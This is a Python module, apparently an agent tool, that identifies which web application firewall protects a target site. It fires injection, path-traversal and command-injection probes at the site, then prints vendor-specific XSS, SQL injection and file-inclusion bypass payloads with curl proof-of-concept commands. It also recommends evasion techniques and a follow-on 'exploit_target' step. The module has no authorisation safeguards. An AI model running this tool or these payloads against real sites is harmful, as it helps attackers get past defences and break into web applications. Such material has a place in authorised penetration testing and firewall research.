"""
WAF (Web Application Firewall) identification and bypass payload generator.
Detects specific WAF products and generates targeted bypass payloads.
"""

import requests
import time
import re
from urllib.parse import quote

from tools.target_reachability import (
    format_fallback_notice,
    format_unreachable_error,
    resolve_web_target,
)

HDR = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"}

WAF_SIGNATURES = {
    "Cloudflare": {
        "headers": {"server": "cloudflare", "cf-ray": ""},
        "cookies": ["__cfduid", "__cf_bm", "cf_clearance"],
        "body": ["cloudflare", "cf-browser-verification", "Attention Required"],
        "status_codes": [403, 503],
        "bypasses": {
            "xss": [
                '<svg/onload=confirm`1`>',
                '<img src=x onerror=alert`1`>',
                '<details/open/ontoggle=alert`1`>',
                '"><img src=x onerror=alert(String.fromCharCode(88,83,83))>',
                '<math><mtext><table><mglyph><svg><mtext><style><img src=x onerror=alert(1)>',
                '{{constructor.constructor("alert(1)")()}}',
            ],
            "sqli": [
                "/*!50000union*/+/*!50000select*/",
                "union%0a%0dselect",
                "-1+un/**/ion+se/**/lect",
                "0x756e696f6e+0x73656c656374",
                "1 and/**/ 1=1",
                "' or 1=1-- -",
            ],
            "lfi": [
                "....//....//....//etc/passwd",
                "%252e%252e%252f%252e%252e%252f/etc/passwd",
                "..%c0%af..%c0%af..%c0%afetc/passwd",
            ],
        },
    },
    "AWS WAF": {
        "headers": {"x-amzn-requestid": "", "x-amz-cf-id": ""},
        "cookies": ["awsalb", "awsalbcors"],
        "body": ["AWS", "Request blocked"],
        "status_codes": [403],
        "bypasses": {
            "xss": [
                '<img/src=x onerror=alert(1)>',
                '<svg onload=alert(1)>',
                '"><svg/onload=confirm(1)//',
            ],
            "sqli": [
                "' or '1'='1",
                "1 union%23%0aselect",
                "-1' UNION ALL SELECT",
            ],
        },
    },
    "Akamai (Kona)": {
        "headers": {"server": "akamaighost", "x-akamai-transformed": ""},
        "cookies": ["akamai", "ak_bmsc", "bm_sz"],
        "body": ["akamai", "Reference&#32;&#35;"],
        "status_codes": [403],
        "bypasses": {
            "xss": [
                '<details open ontoggle=alert(1)>',
                '<svg/onload=confirm(1)>',
                '"-alert(1)-"',
            ],
            "sqli": [
                "' /*!50000or*/ 1=1-- -",
                "1 and%09 1=1",
                "' or 1=1%23",
            ],
        },
    },
    "ModSecurity": {
        "headers": {"server": "modsecurity"},
        "cookies": [],
        "body": ["ModSecurity", "mod_security", "NOYB", "Not Acceptable"],
        "status_codes": [403, 406],
        "bypasses": {
            "xss": [
                '<svg/onload=alert`1`>',
                '<math><mi//xlink:href="data:x,<script>alert(1)</script>">',
                '"><img src=x onerror=\\u0061lert(1)>',
                '<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>',
            ],
            "sqli": [
                "' or 1=1-- -",
                "0' or 1 group by concat(version(),floor(rand(0)*2)) having 1-- -",
                "1' and extractvalue(1,concat(0x7e,version()))-- -",
                "/*!50000union*/ /*!50000select*/",
            ],
        },
    },
    "Imperva (Incapsula)": {
        "headers": {"x-cdn": "imperva", "x-iinfo": ""},
        "cookies": ["visid_incap_", "incap_ses_", "nlbi_"],
        "body": ["incapsula", "imperva", "_Incapsula_Resource"],
        "status_codes": [403],
        "bypasses": {
            "xss": [
                '<img src=x onerror=alert(1)>',
                '<details/open/ontoggle=confirm(1)>',
            ],
            "sqli": [
                "1' and 1=1-- -",
                "' union%0d%0aselect",
            ],
        },
    },
    "Sucuri": {
        "headers": {"server": "sucuri", "x-sucuri-id": ""},
        "cookies": ["sucuri_cloudproxy"],
        "body": ["sucuri", "cloudproxy", "Access Denied - Sucuri"],
        "status_codes": [403],
        "bypasses": {
            "xss": ['<svg/onload=alert(1)>', '<img src=x onerror=confirm(1)>'],
            "sqli": ["' or 1=1-- -", "1 union select"],
        },
    },
    "Wordfence": {
        "headers": {},
        "cookies": ["wfwaf-authcookie"],
        "body": ["wordfence", "wfAction", "This response was generated by Wordfence"],
        "status_codes": [403],
        "bypasses": {
            "xss": ['<img src=x onerror=alert(1)>', '<svg onload=confirm`1`>'],
            "sqli": ["' or 1=1-- -", "/*!union*/ /*!select*/"],
        },
    },
    "F5 BIG-IP ASM": {
        "headers": {"server": "bigip"},
        "cookies": ["TS", "BIGipServer", "f5_cspm"],
        "body": ["The requested URL was rejected", "support ID"],
        "status_codes": [403],
        "bypasses": {
            "xss": ['<svg/onload=alert`1`>'],
            "sqli": ["' or 1=1-- -"],
        },
    },
    "Barracuda": {
        "headers": {},
        "cookies": ["barra_counter_session"],
        "body": ["barracuda", "barra_counter_session"],
        "status_codes": [403],
        "bypasses": {
            "xss": ['<svg onload=alert(1)>'],
            "sqli": ["' or 1=1-- -"],
        },
    },
    "Fortinet FortiWeb": {
        "headers": {},
        "cookies": ["FORTIWAFSID"],
        "body": ["fortigate", "fortiweb", ".fgtauth"],
        "status_codes": [403],
        "bypasses": {
            "xss": ['<svg/onload=alert(1)>'],
            "sqli": ["1' and 1=1-- -"],
        },
    },
}

# Generic WAF trigger payloads
WAF_TRIGGERS = [
    "<script>alert(1)</script>",
    "' OR 1=1-- -",
    "../../etc/passwd",
    "${7*7}",
    "{{7*7}}",
    "; ls -la",
    "| cat /etc/passwd",
]


def waf_fingerprint(target, stream_callback=None):
    """
    Identify WAF product and generate targeted bypass payloads.
    Tests headers, cookies, response bodies, and behavioral analysis.
    """
    def _emit(msg):
        if stream_callback:
            stream_callback("waf_progress", {"message": msg})

    _emit("🌐 Resolving reachable target URL...")
    resolution = resolve_web_target(target, headers=HDR)
    if not resolution.get("ok"):
        _emit("  ❌ Target unreachable across allowed URL variants")
        return format_unreachable_error(target, resolution)

    base = (resolution.get("selected_url") or resolution.get("normalized_url") or target).rstrip("/")
    fallback_note = format_fallback_notice(resolution)
    if fallback_note:
        _emit("  ↪ %s" % fallback_note)

    _emit(f"🎯 WAF Fingerprinting: {base}")
    start = time.time()
    detected_wafs = {}

    # ── Phase 1: Passive detection (headers + cookies on clean request) ──
    _emit("🔍 Phase 1: Passive detection (clean request)...")
    try:
        r = requests.get(base, timeout=10, headers=HDR, verify=False, allow_redirects=True)
    except Exception:
        return format_unreachable_error(target, resolution)

    resp_headers = {k.lower(): v.lower() for k, v in r.headers.items()}
    resp_cookies = {c.name.lower(): c.value for c in r.cookies}
    resp_body = r.text.lower()

    for waf_name, sigs in WAF_SIGNATURES.items():
        score = 0

        # Check headers
        for h_key, h_val in sigs["headers"].items():
            if h_key.lower() in resp_headers:
                if not h_val or h_val in resp_headers[h_key.lower()]:
                    score += 30

        # Check cookies
        for cookie in sigs["cookies"]:
            for rc in resp_cookies:
                if cookie.lower() in rc:
                    score += 25

        # Check body
        for pattern in sigs["body"]:
            if pattern.lower() in resp_body:
                score += 20

        if score > 0:
            detected_wafs[waf_name] = {"score": score, "method": "passive"}

    # ── Phase 2: Active detection (trigger WAF with malicious payloads) ──
    _emit("🔨 Phase 2: Active detection (triggering WAF)...")
    for payload in WAF_TRIGGERS:
        try:
            test_url = f"{base}/?test={quote(payload)}"
            r_trigger = requests.get(test_url, timeout=8, headers=HDR, verify=False, allow_redirects=False)

            trigger_headers = {k.lower(): v.lower() for k, v in r_trigger.headers.items()}
            trigger_cookies = {c.name.lower(): c.value for c in r_trigger.cookies}
            trigger_body = r_trigger.text.lower()

            for waf_name, sigs in WAF_SIGNATURES.items():
                score_add = 0

                # Check if blocked
                if r_trigger.status_code in sigs["status_codes"]:
                    score_add += 15

                # Check triggered response
                for h_key, h_val in sigs["headers"].items():
                    if h_key.lower() in trigger_headers:
                        score_add += 10

                for pattern in sigs["body"]:
                    if pattern.lower() in trigger_body:
                        score_add += 15

                for cookie in sigs["cookies"]:
                    for rc in trigger_cookies:
                        if cookie.lower() in rc:
                            score_add += 10

                if score_add > 0:
                    if waf_name in detected_wafs:
                        detected_wafs[waf_name]["score"] += score_add
                    else:
                        detected_wafs[waf_name] = {"score": score_add, "method": "active"}

            # Generic block detection
            if r_trigger.status_code in (403, 406, 429, 503) and not detected_wafs:
                if any(kw in trigger_body for kw in ["blocked", "denied", "forbidden", "not acceptable", "security"]):
                    detected_wafs["Unknown WAF"] = {"score": 30, "method": "behavioral"}

        except Exception:
            continue

    # ── Phase 3: Behavioral analysis ──
    _emit("🧪 Phase 3: Behavioral analysis...")

    # Rate limiting test
    rate_limited = False
    try:
        for i in range(10):
            r = requests.get(f"{base}/?t={i}", timeout=3, headers=HDR, verify=False)
            if r.status_code == 429:
                rate_limited = True
                break
    except Exception:
        pass

    # Method-based blocking
    method_blocks = []
    for method in ["PUT", "DELETE", "PATCH", "TRACE", "OPTIONS"]:
        try:
            r = requests.request(method, base, timeout=5, headers=HDR, verify=False)
            if r.status_code in (403, 405, 406):
                method_blocks.append(method)
        except Exception:
            pass

    elapsed = time.time() - start

    # Sort by confidence
    sorted_wafs = sorted(detected_wafs.items(), key=lambda x: x[1]["score"], reverse=True)

    # ── Format output ──
    lines = [
        f"WAF FINGERPRINT RESULTS for {base}",
        f"{'='*60}",
        f"Time: {elapsed:.1f}s\n",
    ]
    if fallback_note:
        lines = [fallback_note, ""] + lines

    if not sorted_wafs:
        lines.append("✅ NO WAF DETECTED")
        lines.append("   The target does not appear to have a WAF.")
        lines.append("   Standard payloads should work without bypass techniques.\n")
    else:
        lines.append("🛡️ DETECTED WAF(S)")
        lines.append("-" * 40)
        for waf_name, info in sorted_wafs:
            confidence = min(info["score"], 100)
            icon = "🔴" if confidence >= 70 else "🟡" if confidence >= 40 else "⚪"
            lines.append(f"  {icon} {waf_name} (confidence: {confidence}%, detected via: {info['method']})")
        lines.append("")

        # Bypass payloads for top WAF
        top_waf = sorted_wafs[0][0]
        if top_waf in WAF_SIGNATURES:
            bypasses = WAF_SIGNATURES[top_waf].get("bypasses", {})
            lines.append(f"⚔️ BYPASS PAYLOADS for {top_waf}")
            lines.append("-" * 40)
            for attack_type, payloads in bypasses.items():
                lines.append(f"  {attack_type.upper()}:")
                for payload in payloads:
                    lines.append(f"    {payload}")
                    # curl PoC
                    encoded = quote(payload)
                    lines.append(f"    curl '{base}/?q={encoded}'")
                lines.append("")

    # Behavioral findings
    lines.append("🔍 BEHAVIORAL ANALYSIS")
    lines.append("-" * 40)
    if rate_limited:
        lines.append("  ⚠️ Rate limiting detected — slow down scans or use delays")
    else:
        lines.append("  ✅ No rate limiting detected")
    if method_blocks:
        lines.append(f"  Blocked HTTP methods: {', '.join(method_blocks)}")
    else:
        lines.append("  All HTTP methods allowed")
    lines.append("")

    # Recommendations
    lines.append("RECOMMENDATIONS")
    lines.append("-" * 40)
    if sorted_wafs:
        top = sorted_wafs[0][0]
        lines.append(f"  1. Use {top}-specific bypass payloads in exploit_target")
        lines.append(f"  2. Try encoding: double-URL-encode, unicode, HTML entities")
        lines.append(f"  3. Use HTTP parameter pollution (HPP)")
        lines.append(f"  4. Try different HTTP methods (POST vs GET)")
        lines.append(f"  5. Use chunked transfer encoding")
        if rate_limited:
            lines.append(f"  6. Add delays between requests (1-2s)")
    else:
        lines.append("  No WAF detected — use standard payloads")
        lines.append("  Run exploit_target type='auto' for full exploitation")

    return "\n".join(lines)


TOOL_DEFINITION = {
    "type": "function",
    "function": {
        "name": "waf_fingerprint",
        "description": "Identify Web Application Firewall (WAF) product protecting a target and generate targeted bypass payloads. Detects Cloudflare, AWS WAF, Akamai, ModSecurity, Imperva, Sucuri, Wordfence, F5 BIG-IP, Barracuda, and FortiWeb. Provides WAF-specific XSS, SQLi, and LFI bypass payloads with curl PoCs. Also checks rate limiting and blocked HTTP methods.",
        "parameters": {
            "type": "object",
            "properties": {
                "target": {
                    "type": "string",
                    "description": "Target URL to fingerprint for WAF"
                }
            },
            "required": ["target"]
        }
    }
}
